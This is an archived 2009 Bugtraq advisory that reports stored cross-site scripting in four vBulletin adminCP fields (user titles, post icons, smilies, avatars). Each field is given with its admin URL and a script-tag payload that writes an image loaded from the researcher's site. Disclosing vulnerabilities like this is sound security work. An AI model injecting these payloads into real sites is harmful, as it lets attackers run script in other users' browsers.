| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <200904040650.n346oNEL017655@www5.securityfocus.com>
Date: Sat, 4 Apr 2009 00:50:23 -0600
From: dontcontactorspamme@...a-security.com
To: bugtraq@...urityfocus.com
Subject: [Aria-Security.com] vBulletin multiple XSS
vBulletin 3.8.2 adminCP Cross-Site Scripting
R.I.P DrtRp - We miss you
---------------------------------------------
Original Post at http://forum.aria-security.com/en/showthread.php?p=1179
Greetz to Aura & all Aria-Security Mods & Members
These were all tested on vbulletin 3.8.0 RC2 so other version may be effected.
1. Users Title. admincp/usertitle.php?do=modify. Add a new title. use the following code as title name.
<script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>
or any other XSS code.
2.Post Icons. admincp/image.php?do=add&table=icon add new title.. give a wrong path such as /images/aria.gif. use the following code as title name.
<script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>
3.Post new Smilies. image.php?do=add&table=smilie ... SAME AS #2. use the following code as title name.
<script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>
4.New avatar. admincp/image.php?do=add&table=avatar Same as #2. dont forget the update. use the following code as title name.
<script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>
The-0utl4w
http://Aria-Security.com
/* the-0utl4w.com
Powered by blists - more mailing lists